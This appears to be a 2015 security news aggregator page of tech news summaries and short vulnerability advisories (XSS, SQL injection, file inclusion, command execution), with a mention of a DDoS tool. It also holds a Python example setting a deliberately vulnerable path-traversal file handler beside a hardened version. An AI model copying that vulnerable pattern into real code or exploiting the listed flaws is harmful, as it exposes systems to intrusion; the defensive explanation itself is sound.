Analysis: Iran’s Nuclear Program Has Been an Astronomical Waste

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Lasrick writes: Business Insider’s Armin Rosen uses a fuel-cost calculator from the Bulletin of the Atomic Scientists to show that Iran’s nuclear program has been “astronomically costly” for the country. Rosen uses calculations from this tool to hypothesize that what Iran “interprets as the country’s ‘rights’ under the 1970 Non-Proliferation Treaty is a diplomatic victory[…]

OpenSSH 6.9p1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

This is a Linux/portable port of OpenBSD’s superior OpenSSH. OpenSSH is based on the last free version of Tatu Ylonen’s SSH with all patent-encumbered algorithms removed, all known security bugs fixed, new features reintroduced, & many other clean-ups. View Source

Apple Security Advisory 2015-06-30-4

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Apple Security Advisory 2015-06-30-4 – Safari 8.0.7, Safari 7.1.7, & Safari 6.2.7 are now available & address account takeover, WebSQL database access, & various other issues. View Source

Apple Security Advisory 2015-06-30-3

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Apple Security Advisory 2015-06-30-3 – Mac EFI Security Update 2015-001 is now available & addresses EFI flash memory modification & memory corruption issues. View Source

Apple Security Advisory 2015-06-30-2

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Apple Security Advisory 2015-06-30-2 – OS X Yosemite 10.10.4 & Security Update 2015-005 are now available & address privilege escalation, arbitrary code execution, access bypass, & various other vulnerabilities. View Source

UK’s National Computer Museum Looks For Help Repairing BBC Micros

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

tresho writes: 1981-era 8-bit BBC Micro computers & peripherals are displayed in a special interactive exhibit at the UK’s National Museum of Computing designed to give modern students a taste of programming a vintage machine. Now, the museum is asking for help maintaining them. “We want to find out whether people have got skills out[…]

Apple Security Advisory 2015-06-30-1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Apple Security Advisory 2015-06-30-1 – iOS 8.4 is now available & addresses denial of service, an incorrect issued certificate, arbitrary code execution, & various other flaws. View Source

Faraday 1.0.11

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation & analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take[…]

Climatix BACnet/IP Communication Module Cross Site Scripting

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Climatix BACnet/IP communication module versions prior to 10.34 suffer from a cross site scripting vulnerability. View Source

X-Cart 4.5.0 Cross Site Scripting

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

X-Cart version 4.5.0 suffers from a cross site scripting vulnerability. View Source

Surveillance Court: NSA Can Resume Bulk Surveillance

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

An anonymous reader writes: We all celebrated back in May when a federal court ruled the NSA’s phone surveillance illegal, & again at the beginning of June, when the Patriot Act expired, ending authorization for that surveillance. Unfortunately, the NY Times now reports on a ruling from the Foreign Intelligence Surveillance Court, which concluded that[…]

TimeDoctor Pro 1.4.72.3 Insecure Transport

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

TimeDoctor’s autoupdate feature downloads & executes files over plain HTTP & does not perform any check on the files. An attacker with MITM capabilities (e.g., when a user connects to a public wifi) could override the TimeDoctor subdomain & then execute custom binaries on the machine where the application is running. View Source

ManageEngine Password Manager Pro 8.1 SQL Injection

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

ManageEngine Password Manager Pro version 8.1 suffers from a remote SQL injection vulnerability. View Source

Red Hat Security Advisory 2015-1199-01

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Red Hat Security Advisory 2015-1199-01 – The kernel packages contain the Linux kernel, the core of any Linux operating system. It was found that the Linux kernel’s implementation of vectored pipe read & write functionality did not take into account the I/O vectors that were already processed when retrying after a failed atomic access operation,[…]

Ubuntu Security Notice USN-2652-1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Ubuntu Security Notice 2652-1 – It was discovered that Chromium did not properly consider the scheme when determining whether a URL is associated with a WebUI SiteInstance. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit this to bypass security restrictions. It was discovered that Blink did[…]

Red Hat Security Advisory 2015-1197-01

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

Red Hat Security Advisory 2015-1197-01 – OpenSSL is a toolkit that implements the Secure Sockets Layer & Transport Layer Security protocols, as well as a full-strength, general purpose cryptography library. An out-of-bounds read flaw was found in the X509_cmp_time() function of OpenSSL. A specially crafted X.509 certificate or a Certificate Revocation List could possibly cause[…]

Packet Storm New Exploits For June, 2015

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

This archive contains 183 exploits that were added to Packet Storm in June, 2015. View Source

Is Safari the New Internet Explorer?

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

An anonymous reader writes: Software developer Nolan Lawson says Apple’s Safari has taken the place of Microsoft’s Internet Explorer as the major browser that lags behind all the others. This comes shortly after the Edge Conference, where major players in web technologies got together to discuss the state of the industry & what’s ahead. Lawson[…]

DAVOSET 1.2.5

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: July 1, 2015

DAVOSET is a tool for committing distributed denial of service attacks using execution on other sites. View Source

Quebec Government May Force ISPs To Block Gambling Websites

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

New submitter ottawan- writes: In order to drive more customers to their own online gambling website, the Quebec government & Loto-Quebec (the provincial organization in charge of gaming & lotteries) are thinking about forcing the province’s ISPs to block all other online gambling websites. The list of websites to be blocked will be maintained by[…]

Celebrating Workarounds, Kludges, and Hacks

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

itwbennett writes: We all have some favorite workarounds that right a perceived wrong (like getting around the Wall Street Journal paywall) or make something work the way we think it ought to. From turning off annoying features in your Prius to getting around sanctions in Crimea & convincing your Android phone you’re somewhere you’re not,[…]

Apple Loses Ebook Price Fixing Appeal, Must Pay $450 Million

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

An anonymous reader writes: A federal appeals court ruled 2-1 today that Apple indeed conspired with publishers to increase ebook prices. The ruling puts Apple on the hook for the $450 million settlement reached in 2014 with lawyers & attorneys general from 33 states. The Justice Dept. contended that the price-fixing conspiracy raised the price[…]

Stanford Starts the ‘Secure Internet of Things Project’

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

An anonymous reader writes: The internet-of-things is here to stay. Lots of people now have smart lights, smart thermostats, smart appliances, smart fire detectors, & other internet-connect gadgets installed in their houses. The security of those devices has been an obvious & predictable problem since day one. Manufacturers can’t be bothered to provide updates to[…]

Cory Doctorow Talks About Fighting the DMCA (2 Videos)

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Wikipedia says, ‘Cory Efram Doctorow (born July 17, 1971) is a Canadian-British blogger, journalist, & science fiction author who serves as co-editor of the blog Boing Boing. He is an activist in favour of liberalising copyright laws & a proponent of the Creative Commons organization, using some of their licenses for his books.[…]

White House Lures Mudge From Google To Launch Cyber UL

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

chicksdaddy writes: The Obama White House has tapped famed hacker Peiter Zatko (aka “Mudge”) to head up a new project aimed at developing an “underwriters’ lab” for cyber security. The new organization would function as an independent, non-profit entity designed to assess the security strengths & weaknesses of products & publish the results of its tests.[…]

Microsoft To Sell Bing Maps, Advertising Sections

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

UnknowingFool writes: Microsoft has announced that they will sell some Bing Maps technology to Uber & their advertising business to AOL. About 1,300 employees are expected to be offered positions in their new companies. CEO Nadella said previously that there would be “tough choices” to be made. Some outside analysts have said neither venture was[…]

Test Pilot: the F-35 Can’t Dogfight

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

schwit1 sends this report from the War Is Boring column: A test pilot has some very, very bad news about the F-35 Joint Strike Fighter. The pricey new stealth jet can’t turn or climb fast enough to hit an enemy plane during a dogfight or to dodge the enemy’s own gunfire, the pilot reported following[…]

Ask Slashdot: What To Do With Empty Toner Cartridges?

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

New submitter MoarSauce123 writes: Over time I accumulated a number of empty toner cartridges for a Brother laser printer. Initially, I wanted to take a local office supply chain store up on their offer to give me store credit for the returned cartridge. For that credit to be issued I would have to sign up[…]

What If You Could See Asteroids In the Night Sky?

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

An anonymous reader writes: As part of Asteroid Day a 360-degree video rendering the night sky with the population of near-earth asteroids included has been created by ‘Astronogamer’ Scott Manley. The video shows how the Earth flies through a cloud of asteroids on its journey around the sun, & yet we’ve only discovered about 1%[…]

Interviews: Brian Krebs Answers Your Questions

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

A few weeks ago you had a chance to ask Brian Krebs about security, cybercrime & what it’s like to be the victim of Swatting. Below you will find his answers to your questions. Read more of this story at Slashdot. View Source

Nvidia Details ‘Gameworks VR’, Aims To Boost Virtual Reality Render Performance

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

An anonymous reader writes: In a guest article published to Road to VR, Nvidia graphics programmer Nathan Reed details Nvidia’s ‘Gameworks VR’ initiative which the company says is designed to boost virtual reality render performance, including support for ‘VR SLI’ which will render one eye view per GPU for low latency stereoscopy. While many Gameworks[…]

Cisco To Acquire OpenDNS

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

New submitter Tokolosh writes: Both Cisco & OpenDNS announced today that the former is to acquire the latter. From the Cisco announcement: “To build on Cisco’s advanced threat protection capabilities, we plan to continue to innovate a cloud delivered Security platform integrating OpenDNS’ key capabilities to accelerate that work. Over time, we will look to[…]

RFC 7568 Deprecates SSLv3 As Insecure

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

AmiMoJo writes: SSLv3 should not be used, according to the IETF’s RFC 7568. Despite being replaced by three versions of TLS, SSLv3 is still in use. Clients & servers are now recommended to reject requests to use SSLv3 for secure communication. “SSLv3 Is Comprehensively Broken,” say the authors, & lay out its flaws in detail.[…]

UK Researchers Find IPv6-Related Data Leaks In 11 of 14 VPN Providers

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

jan_jes writes: According to researchers at Queen Mary University of London, services used by hundreds of thousands of people in the UK to protect their identity on the web are vulnerable to leaks. The study of 14 popular VPN providers found that 11 of them leaked information about the user because of a vulnerability known[…]

First Fedora Image For the MIPS Available For Testing

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

New submitter alexvoica writes: Today Fedora contributor Michal Toman has announced that the first Fedora 22 image for 32-bit MIPS CPUs is available for testing; this version of the operating system was developed using our Creator CI20 microcomputer, which includes a 1.2 GHz dual-core MIPS processor. In addition, Michal announced he is working on a[…]

8 Yelp Reviewers Hit With $1.2 Million Defamation Suits

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

New submitter goodboi writes: A Silicon Valley building contractor is suing 8 of its critics over the reviews they posted on Yelp. The negative reviews were filtered out by Yelp’s secretive ranking system, yet in court documents filed earlier this month, Link Corporation claims that the bad publicity cost over $165,000 in lost business. Read[…]

SMS Co-Inventor Matti Makkonen Dead At 63

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

An anonymous reader writes: The BBC News reports that Matti Makkonen, a ‘grand old man of mobile industry’ who helped launch the worldwide sensation of texting, has died at the age of 63 after an illness. Although planning to retire later in 2015 from the board of Finnet Telecoms, Makkonen constantly remained fascinated with communications[…]

European Government Agrees On Net Neutrality Rules, With Exemptions

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

An anonymous reader writes: The European Union’s three main legislative bodies, the European Council, the European Parliament, & the European Commission, have reached an agreement on “Open Internet” rules that establish principles similar to Net Neutrality in the EU. The rules require that all internet traffic & users be treated equally, forbidding paid-for prioritisation of[…]

Lawsuit Filed Over Domain Name Registered 16 Years Before Plaintiff’s Use

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

HughPickens.com writes: Cybersquatting is registering, selling or using a domain name with the intent of profiting from the goodwill of someone else’s trademark. It generally refers to the practice of buying up domain names that use the names of existing businesses with the intent to sell the names for a profit to those businesses. Now[…]

How Computer Science Education Got Practical (Again)

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

jfruh writes: In the 1980s & 1990s, thousands of young people who had grown up tinkering with PCs hit college & dove into curricula designed around the vague notion that they might want to “do something with computers.” Today, computer science education is a lot more practical — though in many ways that’s just going[…]

Asteroid Day On June 30 Aims To Raise Awareness of Collision Risks

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

benonemusic writes: International organizers–including Queen’s Brian May, an astrophysicist–have organized the world’s first Asteroid Day on June 30, as a means to raise awareness for future collision risks & encourage actions to minimize the threats from such events. “If we can track the trajectories of asteroids & monitor their movement in our solar system, then[…]

Creating Bacterial "Fight Clubs" To Discover New Drugs

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Science_afficionado writes: Vanderbilt chemists have shown that creating bacterial ‘fight clubs’ is an effective way to discover natural biomolecules with the properties required for new drugs. They have demonstrated the method by using it to discover a new class of antibiotic with anti-cancer properties. From the Vanderbilt website: “That is the conclusion of a team[…]

The Programmer’s Path To Management

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

snydeq writes: The transition from command line to line-of-command requires a new mind-set — & a thick skin, writes InfoWorld’s Paul Heltzel in a tips-based article aimed at programmers interested in breaking into management. “Talented engineers may see managing a team as the next step to growing their careers. So if you’re moving in this[…]

How IKEA Patched Shellshock

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

jones_supa writes: Magnus Glantz, IT manager at IKEA, revealed that the Swedish furniture retailer has more than 3,500 Red Hat Enterprise Linux servers. With Shellshock, every single one of those servers needed to be patched to limit the risk of exploitation. So how did IKEA patch all those servers? Glantz showed a simple one-line Linux[…]

Study Suggests That HUD Tech May Actually Reduce Driving Safety

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Zothecula writes: Having a heads-up display constantly feed you information while cruising down the road may make you feel like a jet pilot ready to avoid any potential danger, but recent findings suggest otherwise. Studies done at the University of Toronto show that the HUD multi-tasking method of driving a vehicle is dangerous. “Drivers need[…]

Debian Security Advisory 3297-1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Debian Linux Security Advisory 3297-1 – It was discovered that unattended-upgrades, a script for automatic installation of security upgrades, did not properly authenticate downloaded packages when the force-confold or force-confnew dpkg options were enabled via the DPkg::Options::* apt configuration. View Source

Ubuntu Security Notice USN-2657-1

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Ubuntu Security Notice 2657-1 – It was discovered that unattended-upgrades incorrectly performed authentication checks in certain configurations. If a remote attacker were able to perform a man-in-the-middle attack, this flaw could potentially be used to install altered packages. View Source

Red Hat Security Advisory 2015-1196-01

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Red Hat Security Advisory 2015-1196-01 – PostgreSQL is an advanced object-relational database management system. A double-free flaw was found in the connection handling. An unauthenticated attacker could exploit this flaw to crash the PostgreSQL back end by disconnecting at approximately the same time as the authentication time out is triggered. It was discovered that PostgreSQL[…]

Red Hat Security Advisory 2015-1195-01

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Red Hat Security Advisory 2015-1195-01 – PostgreSQL is an advanced object-relational database management system. A double-free flaw was found in the connection handling. An unauthenticated attacker could exploit this flaw to crash the PostgreSQL back end by disconnecting at approximately the same time as the authentication time out is triggered. It was discovered that PostgreSQL[…]

Red Hat Security Advisory 2015-1193-01

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Red Hat Security Advisory 2015-1193-01 – Xerces-C is a validating XML parser written in a portable subset of C++. A flaw was found in the way the Xerces-C XML parser processed certain XML documents. A remote attacker could provide specially crafted XML input that, when parsed by an application using Xerces-C, would cause that application[…]

Red Hat Security Advisory 2015-1194-01

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Red Hat Security Advisory 2015-1194-01 – PostgreSQL is an advanced object-relational database management system. A double-free flaw was found in the connection handling. An unauthenticated attacker could exploit this flaw to crash the PostgreSQL back end by disconnecting at approximately the same time as the authentication time out is triggered. It was discovered that PostgreSQL[…]

Watchguard XCS 10.0 SQL Injection / Command Execution

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The Watchguard XCS virtual appliance contains a number of vulnerabilities, including unauthenticated SQL injection, command execution & privilege escalation. By combining these vulnerabilities, an attacker may remotely obtain root privileges on the underlying host. Versions 10.0 & below are affected. View Source

CollabNet Subversion Edge Management CSRF

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge Management Frontend fails to implement any cross site request forgery protection. Fixed in version 5.0. Version 4.0.11 is affected. View Source

WedgeOS 4.0.4 Arbitrary File Read / Command Execution

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Wedge Networks WedgeOS Virtual Appliance contains a number of security vulnerabilities, including unauthenticated arbitrary file read as root, command injection in the web interface, privilege escalation to root, & command execution via the system update functionality. Versions 4.0.4 & below are affected. View Source

CollabNet Subversion Edge Management Tail LFI

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge Management Frontend allows authenticated admins to read arbitrary local files via the logfile “filename” parameter of the tail action. Fixed in version 5.0. Version 4.0.11 is affected. View Source

CollabNet Subversion Edge Management Missing Password Check

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The management frontend does not require the old password for changing the password to a new one. An authenticated attacker may perform password setting attacks via XSRF without knowing the current password. An attacker that stole a Session ID (cookie) is able to gain persistent access by changing the password. Fixed in version 5.0. Version[…]

NetIQ Access Manager 4.0 SP1 XXE Injection

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

NetIQ Access Manager is vulnerable to XXE injection attacks. View Source

CollabNet Subversion Edge Management Unsalted Hashes

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge Management stores passwords as unsalted MD5 hashes. Unsalted MD5 hashes can easily be cracked by brute forcing the password. Fixed in version 5.0. Version 4.0.11 is affected. View Source

CollabNet Subversion Edge Management Multiple Logins

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge Management web application does not restrict users to being logged in only once & does not provide a configuration option to enforce this for admin and/or user accounts. Fixed in version 5.0. Version 4.0.11 is affected. View Source

Courier Heap Overflow / Out Of Bounds Read Access

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

Courier mail server versions before 0.75 suffer from out of bounds read access & heap overflow vulnerabilities. View Source

CollabNet Subversion Edge Management Brute Forcing

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge Management Frontend does not protect against brute forcing accounts. An attacker has infinite tries to guess a valid user password. Fixed in version 5.0. Version 4.0.11 is affected. View Source

CollabNet Subversion Edge Management listViewItem LFI

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge Management Frontend allows authenticated admins to read arbitrary local files via the logfile “listViewItem” parameter of the “index” action. Fixed in version 5.0. Version 4.0.11 is affected. View Source

CollabNet Subversion Edge Management Show LFI

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge Management Frontend allows authenticated admins to read arbitrary local files via the logfile “filename” parameter of the show action. Fixed in version 5.0. Version 4.0.11 is affected. View Source

CollabNet Subversion Edge Management Clickjacking

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

CollabNet Subversion Edge Management Frontend does not implement clickjacking protection. Fixed in version 5.0. Version 4.0.11 is affected. View Source

CollabNet Subversion Edge Management Weak Password Policy

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge Management does not implement a strong password policy. Passwords like “aaaaa” are allowed, as the only requirement is that the password is at least 5 characters long. Fixed in version 5.0. Version 4.0.11 is affected. View Source

CollabNet Subversion Edge Management Autocomplete Enabled

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 30, 2015

The CollabNet Subversion Edge management frontend login page password field has autocomplete enabled. This may allow an attacker to retrieve a stored password from the browser’s key store. Fixed in version 5.0. Version 4.0.11 is affected. View Source

Ask Slashdot: Choosing the Right Open Source License

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

NicknamesAreStupid writes: I need to select an open source license. I am developing an open source iOS application that uses a significant number of other open source projects which, in turn, use a number of different open source licenses such as MPL/GPL, MIT, & BSD. I am also using sample code from Apple’s developer site,[…]

Uber France Leaders Arrested For Running Illegal Taxi Company

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

An anonymous reader writes: Two Uber executives were arrested by French authorities for running an illegal taxi company & concealing illegal documents. This is not the first time Uber has run into trouble in France. Recently, taxi drivers started a nation-wide protest, blocking access to Roissy airport & the nation’s interior minister issued a ban[…]

Airplane Coatings Help Recoup Fuel Efficiency Lost To Bug Splatter

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

MTorrice writes: When bugs hit the wings of oncoming airplanes, they create a problem. Their blood, called hemolymph, sticks to an airplane’s wings, disrupting the smooth airflow over them & reducing the aircraft’s fuel efficiency. To fight the problem, NASA is working on developing a coating that could help aircraft repel bug remains during flight.[…]

Malwarebytes Offers Pirates Its Premium Antimalware Product For Free

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

An anonymous reader writes: If you have a cracked or pirated version of the Malwarebytes Anti-Malware (MBAM) product, the company has debuted an Amnesty program for you. Venturebeat reports: “If you pirated Malwarebytes Anti-Malware, purchased a counterfeit version of the software, or are having problems with your key in general, the company is offering a free[…]

Avira Wins Case Upholding Its Right To Block Adware

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Mark Wilson writes: Security firm Avira has won a court case that can not only be chalked up as a win for consumer rights, but could also set something of a precedent. German company Freemium.com took Avira to court for warning users about “potentially unwanted applications” that could be bundled along with a number of[…]

To Learn (Or Not Learn) JQuery

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Nerval’s Lobster writes: jQuery isn’t without its controversies, & some developers distrust its use in larger projects because (some say) it ultimately leads to breakage-prone code that’s harder to maintain. But given its prevalence, jQuery is probably essential to know, so what are the most significant elements to learn in order to become adept-enough at[…]

The Real-Life Dangers of Augmented Reality

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Tekla Perry writes: Today’s augmented reality devices have yet to go through extensive tests of their impact on their wearers’ health & safety. But by looking at existing research involving visual & motor impairments, two Kaiser Permanente researchers find they can draw conclusions about the promise & perils of augmented reality, & point to ways[…]

SCOTUS Denies Google’s Request To Appeal Oracle API Case

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

New submitter Neil_Brown writes: The Supreme Court of the United States has today denied Google’s request to appeal against the Court of Appeals for the Federal Circuit’s ruling (PDF) that the structure, sequence & organization of 37 of Oracle’s APIs (application program interfaces) was capable of copyright protection. The case is not over, as Google[…]

Interviews: Ask Steve Jackson About Designing Games

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Since starting his own company in 1980, Steve Jackson, founder & editor-in-chief of Steve Jackson Games, has created a number of hits, starting with Car Wars . . . followed shortly by Illuminati, & after by GURPS, the “Generic Universal Roleplaying System.” In 1983, he was elected to the Adventure Gaming Hall of Fame –[…]

When a Company Gets Sold, Your Data May Be Sold, Too

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

An anonymous reader writes: A new report points out that many of the top internet sites have language in their privacy policies saying that your private data might be transferred in the event of an acquisition, bankruptcy sale, or other transaction. They effectively say, “We won’t ever sell your information, unless things go wrong for[…]

MIT System Fixes Software Bugs Without Access To Source Code

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

jan_jes writes: MIT researchers have presented a new system at the Association for Computing Machinery’s Programming Language Design & Implementation conference that repairs software bugs by automatically importing functionality from other, more secure applications. According to MIT, “The system, dubbed CodePhage, doesn’t require access to the source code of the applications. Instead, it analyzes the[…]

libpcap 1.7.4

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Libpcap is a portable packet capture library which is used in many packet sniffers, including Tcpdump. View Source

GetSimple CMS 5.7.3.1 Cross Site Scripting

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

GetSimple CMS version 5.7.3.1 suffers from a persistent cross site scripting vulnerability. View Source

MODX Revolution 2.3.3-pl Cross Site Scripting

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

MODX Revolution version 2.3.3-pl suffers from multiple cross site scripting vulnerabilities. View Source

Fiyo CMS 2.0_1.9.1 SQL Injection

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Fiyo CMS version 2.0_1.9.1 suffers from multiple remote SQL injection vulnerabilities. View Source

Novius OS 5.0.1-elche XSS / LFI / Open Redirect

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

Novius OS version 5.0.1-elche suffers from cross site scripting, local file inclusion, & open redirection vulnerabilities. View Source

CollabNet Subversion Edge Management Local File Inclusion

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

The CollabNet Subversion Edge Management Frontend allows authenticated admins to read arbitrary local files via the logfile “filename” parameter of the “downloadHook” action. Fixed in version 5.0. View Source
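
The flaw described above is a path traversal in a file-download handler: a file name taken from the request is joined onto a fixed directory and opened. The following is an added illustration, not CollabNet's code; the `LOG_DIR` value and the function names are assumptions, since the page does not describe the real handler's layout. It puts the vulnerable pattern next to a hardened one that accepts only a bare file name and re-checks the normalised path against the base directory:

```python
import posixpath

# Constructed stand-in for the application's log directory; the page does
# not describe the real product's layout.
LOG_DIR = "/var/opt/example/logs"


def vulnerable_log_path(filename: str) -> str:
    """The flawed pattern: the request parameter is joined onto the log
    directory and handed straight to the file open. '../' sequences in
    `filename` walk out of LOG_DIR, so any readable file can be fetched."""
    return posixpath.normpath(posixpath.join(LOG_DIR, filename))


def resolve_log_path(filename: str):
    """Hardened version. Returns the path to serve, or None to refuse.

    Two independent checks: the name must be a bare file name (no separator,
    no NUL, not '.' or '..'), and the normalised result must still sit under
    LOG_DIR. In production also pass both sides through os.path.realpath so
    that a symlink dropped inside the log directory cannot point elsewhere."""
    if not filename or "\x00" in filename or filename in (".", ".."):
        return None
    if posixpath.basename(filename) != filename:
        return None
    candidate = posixpath.normpath(posixpath.join(LOG_DIR, filename))
    if posixpath.commonpath([LOG_DIR, candidate]) != LOG_DIR:
        return None
    return candidate
```

The authenticated-admin precondition from the advisory is unchanged by the hardened version: it limits what a caller can reach, not who may call the action. Authorisation and path validation are separate controls, and a handler needs both.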

Bill Gates Investing $2 Billion In Renewables

by w00t
Categories: The News
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

An anonymous reader writes: Bill Gates has dumped a billion dollars into renewables, & now he’s ready to double down. Gates announced he will increase his investment in renewable energy technologies to $2 billion in an attempt to “bend the curve” on limiting climate change. He is focusing on risky investments that favor “breakthrough” technologies[…]

CollabNet Subversion Edge Management Credential Leak

by w00t
Categories: New Vulnerabilities
Tags: No Tags
Comments: No Comments
Published on: June 29, 2015

The CollabNet Subversion Edge Management Frontend leaks the unsalted MD5 hash of the password of the currently logged-in user via a “POST /csvn/user/index” request. An attacker who exploits an XSS or has gained a valid session via other means is able to retrieve the unsalted MD5 hash of the corresponding user & easily crack the[…]
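
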